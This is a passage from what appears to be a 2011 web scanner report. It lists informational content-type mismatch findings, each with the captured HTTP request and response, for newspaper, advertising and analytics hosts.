Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.9.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.2.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/; RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O2021J7F|O20226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:19:37 GMT
Server: Apache
Last-Modified: Sat, 17 Sep 2011 00:30:08 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 23490


            <!-- twitter_dynamic_content -->
               <p><a class="twitter_name sec_track" href="http://twitter.com/TrackGals/" target="_new">Track Gals</a>: Smokin' @<a class=" " href="http://twitter.com/redso
...[SNIP]...

28.28. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/Services/HomePageHandler.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /epaper/Services/HomePageHandler.ashx?host=bostonheraldnie.newspaperdirect.com&type=topnews&language=en&count=16&transform= HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx?date=17.9.2011&width=1087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; homepage_settings_4=20_5_15_6_15_6_15_6_15_6_15_6_30_5_5_5_5_22_11_16_11_11_6_8_1_15_6; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.27.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/
If-Modified-Since: Sat, 17 Sep 2011 01:04:41 GMT

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 17 Sep 2011 01:16:42 GMT
Last-Modified: Sat, 17 Sep 2011 01:06:42 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 3
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:06:41 GMT
Content-Length: 10955

<nobr><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, 'e8459750-9218-41e4-8a6d-5bdc7aaad8fa', this)" onmousemove="HomePageManager.BubbleManager.show(6, 'e8459750-9218-41e4-
...[SNIP]...

28.29. http://bostonheraldnie.newspaperdirect.com/epaper/Services/ImgGalleryHandler.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/Services/ImgGalleryHandler.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /epaper/Services/ImgGalleryHandler.ashx?host=bostonheraldnie.newspaperdirect.com&type=4 HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx?date=17.9.2011&width=1087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.1.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 24 Sep 2011 01:04:38 GMT
Last-Modified: Sat, 17 Sep 2011 01:04:38 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 4
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:41:42 GMT
Content-Length: 28

{types_enabled:[true,false]}

28.30. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=3088279&PluID=0&w=300&h=250&ord=5584185&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/17/db/%2a/a%3B244265875%3B0-0%3B1%3B36677570%3B4307-300/250%3B43616108/43633895/1%3B%3B%7Esscs%3D%3fhttp://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/777269766/Middle/BostonHerald/PhantomOpera_ETN_300x250/PhantomOpera_ETN_300x250.html/4d686437616b35776e72734144666853?$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebOptOut=TRUE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 17 Sep 2011 01:09:55 GMT
Connection: close
Content-Length: 2246

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

28.31. http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /EF949BBC-E1FB-11DF-83A0-DE09EDADD848

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /EF949BBC-E1FB-11DF-83A0-DE09EDADD848?cb=1450864799 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414207&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=91119514&rk1=18936363&rk2=1316239536.352&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:10 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 13448

document.write('<style type="text/css"> div#p360-hybrid300x250TriadBlackGreen-EF949BBC-E1FB-11DF-83A0-DE09EDADD848 { width: 300px; left: 0; font-family: sans-serif; position: relative; d
...[SNIP]...

28.32. http://cpanel.app9.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cpanel.app9.hubspot.com
Path:   /salog.js.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /salog.js.aspx HTTP/1.1
Host: cpanel.app9.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.cpanel.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:50:46 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: .ASPXANONYMOUS=R27wZXuTzQEkAAAAMjg1YjZkOWQtZGIxZS00MTZiLWJlYWItYmIwMmYzMTA1ZGI30; expires=Sat, 15-Sep-2012 19:50:46 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=93ed7895-0288-4720-bfdc-c10d00f88606; domain=cpanel.app9.hubspot.com; expires=Thu, 16-Sep-2021 05:00:00 GMT; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 498
Set-Cookie: HUBSPOT20080=3977319596.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 29353;
var hsWeekEndsIn = 202153;
var hsMonthEndsIn = 1238953;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-09-16 15:50
...[SNIP]...

28.33. http://duckduckgo.com/d.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://duckduckgo.com
Path:   /d.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /d.js?q=imap%20server&t=A&l=us-en&p=1&s=0 HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=imap+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:42:08 GMT
Content-Type: application/x-javascript; charset=UTF-8
Connection: keep-alive
Expires: Fri, 16 Sep 2011 19:42:07 GMT
Cache-Control: no-cache
Content-Length: 12210

da='<div class="ay"><div class="ayi"><a target="_blank" href="/y.js?u2=http%3A%2F%2F1127009.r.msn.com%2F%3Fld%3D4voksMmBQ9bUkZVcBCuJTRp18XXQvERW1jc5lNu0K3VFmso5HHDOgFDDA%2DEzFB9UY6t%2D%2DjZnkes9yvwlsz
...[SNIP]...

28.34. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2F3ps.go.com%2FDynamicAd%3Fsrvc%3Dabc%26adTypes%3DRectangles-Remnant%26url%3D%2Fshows%2Fcharlies-angels%2Fbios%2Feve-french&uid=TVYMYp4lQTRs9JsS_40986728&xy=0%2C0&wh=300%2C250&vchannel=41471866&cid=3941858&iad=1316239176185-96187032503075900&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a; JSESSIONID=800B263560026265DF35D5998DF9421B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D5354AEEDFD6F58DDFDCDA50C673407B; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 106
Date: Sat, 17 Sep 2011 00:58:08 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("TVYMYp4lQTRs9JsS_40986728");

28.35. http://goku.brightcove.com/1pix.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://goku.brightcove.com
Path:   /1pix.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /1pix.gif?dcsdat=1316239536142&playerURL=http%3A//bostonherald.com/news/national/%3Ftype%3Drem911&flashVer=WIN%2010%2C3%2C183%2C7&lang=en&dcssip=&os=Windows%20Server%202008%20R2&dcsref=http%3A//bostonherald.com/news/&affiliateId=&playerTag=&mem=15952&sourceId=84362983001&time=1851&dcsuri=/viewer/player_load&playerId=84359688001&publisherId=84362983001 HTTP/1.1
Host: goku.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:34:00 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 49
Content-Type: text/plain

GIF89a...................!.......,...........T..;

28.36. http://helpdocs.westserver.net/v3/sitemanager/whstart.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://helpdocs.westserver.net
Path:   /v3/sitemanager/whstart.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /v3/sitemanager/whstart.ico HTTP/1.1
Host: helpdocs.westserver.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:50:41 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 31 Oct 2008 20:02:07 GMT
ETag: "178c765-2796-12624dc0"
Accept-Ranges: bytes
Content-Length: 10134
Content-Type: text/plain; charset=UTF-8

..............(...f... ......................h...6
.. ..............00......h.......00..............(....... .........................................................................................
...[SNIP]...

28.37. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ibmwebsphere.tt.omtrdc.net
Path:   /m2/ibmwebsphere/mbox/standard

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/ibmwebsphere/mbox/standard?mboxHost=www-142.ibm.com&mboxSession=1316221012167-554408&mboxPage=1316221012167-554408&screenHeight=1200&screenWidth=1920&browserWidth=1106&browserHeight=789&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=eps_bykeyword_search&mboxId=0&mboxTime=1316203014547&mboxURL=http%3A%2F%2Fwww-142.ibm.com%2Fsoftware%2Fproducts%2Fus%2Fen%2Fsearch%3Fpgel%3Dlnav%26hppcode%3D1%26st%3Dnew%26q1%3Dxss&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: ibmwebsphere.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-142.ibm.com/software/products/us/en/search?pgel=lnav&hppcode=1&st=new&q1=xss
Cookie: mboxSession=1316221012167-554408; mboxPC=1316221012167-554408.19

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1316221012167-554408.19; Domain=ibmwebsphere.tt.omtrdc.net; Expires=Fri, 30-Sep-2011 19:55:58 GMT; Path=/m2/ibmwebsphere
Content-Type: text/javascript
Content-Length: 175
Date: Fri, 16 Sep 2011 19:55:58 GMT
Server: Test & Target

mboxFactories.get('default').get('eps_bykeyword_search',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1316221012167-554408.19");

28.38. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /serve/fb/adtag.js?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljdsOgjAQRH%2DIQC8gYONDtUJAq2IwBt60VRsFL5GkyNdLlOAHuA%2DbmdnsGYiJD4QNpeccgY%2DRDQSBGLm2PPg7d28AQgjG0B8gFxlJeKM05kmkWWPmmn5mxlbx6SvbPaU06g1NaBiwh1p0iek9X7%2EjP4pBpngHaPu6fulcD5JF457M1ipDvM7PRTHfbnTWiIqnQcEnwOFMFfNU2HkqLzzN6rzcoGX%2ESEeGoarqPrQsrbVZlY0pbqX1BgOmVUg%3D%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:18 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1316220738_1316220738684:0654349316815871; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:18 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 539

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljdsOgjAQRH%2DIQC8gYONDtUJAq2IwBt60VRsFL5Gk
...[SNIP]...

28.39. http://livechat.iadvize.com/rpc/referrer.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://livechat.iadvize.com
Path:   /rpc/referrer.php

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /rpc/referrer.php?s=1821&get=&random=1316228161329 HTTP/1.1
Host: livechat.iadvize.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62; 1821vvc=3; 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A2%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316210078%2C%22navTime%22%3A1000%7D; 1821_idz=XnclJ01Pg6id2FcJU13kUkMfaXVNV%2F8gxkjQn8hBPcG6LNaooz40h%2BMaW0hQlsjGSRD%2BkhBEQXtHEo8uNUWZDoUCReT5yO90BLxF%2FLlYyUr51FG%2FyyfLpChY7rUtOwVCw8l%2Fg3u5V7ZarDSzVOiKi6RLcJ2O

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Fri, 16 Sep 2011 21:54:41 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"
Set-Cookie: 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A2%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316210078%2C%22navTime%22%3A1000%2C%22origin_site%22%3A%22%22%2C%22origin%22%3A%22direct%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%7D; path=/
Vary: Accept-Encoding
Content-Length: 173

iAdvize.vStats['origin_site'] = '';iAdvize.vStats['origin'] = 'direct';iAdvize.vStats['refengine'] = '';iAdvize.vStats['refkeyword'] = '';iAdvize.util.delScript('referrer');

28.40. http://members.westhost.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://members.westhost.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: members.westhost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:42:49 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 17 Nov 2008 17:48:02 GMT
ETag: "7e000d-13e-2e2ab880"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=UTF-8

..............(.......(....... ...............................t.....4.....lj......l...t............BD...|.........|...t
...........1.....!331(.....:.....3.1.:...3(..1...e.*.3.......1...x...:.....S3...
...[SNIP]...

28.41. http://network.realmedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://network.realmedia.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: network.realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: OAX=Mhd7ak4/RLQADpZA; RMFL=011R1OlbU1013ac|U1014p8; RMFM=011Qre8RU1018L1; NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 02:10:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Tue, 31 Mar 2009 16:50:50 GMT
ETag: "578e5-1cee-4666d0056ce80"
Accept-Ranges: bytes
Content-Length: 7406
Content-Type: text/plain
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 02:11:19 GMT;path=/;httponly

..............h...6... ..............00..........F...(....... ...........@.......................95..G<'.D:'.F<'.@9+......R...N...c...W...Z...G...Q...U..@}.......C...............T...J..Z...m...+t..t.
...[SNIP]...

28.42. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1523&ref2=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dnntp+server&tzo=360&ms=203 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.giganews.com/?gclid=CMbM1MnAoqsCFQNggwod4mqsoA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=F788D26BA3284C76A75E75F5D13F522A; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Fri, 16 Sep 2011 19:31:17 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

28.43. http://oascentral.bostonherald.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oascentral.bostonherald.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: oascentral.bostonherald.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 02:06:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 23 Apr 2010 14:16:59 GMT
ETag: "beaab-1cee-484e8148e6cc0"
Accept-Ranges: bytes
ntCoent-Length: 7406
Content-Type: text/plain
Cache-Control: private
Content-Length: 7406

..............h...6... ..............00..........F...(....... ...........@.......................95..G<'.D:'.F<'.@9+......R...N...c...W...Z...G...Q...U..@}.......C...............T...J..Z...m...+t..t.
...[SNIP]...

28.44. http://pglb.buzzfed.com/63857/8b52baa86e5b07ac085974feb13e2090  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pglb.buzzfed.com
Path:   /63857/8b52baa86e5b07ac085974feb13e2090

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /63857/8b52baa86e5b07ac085974feb13e2090?callback=BF_PARTNER.gate_response&cb=8827 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 38
Cache-Control: max-age=593977
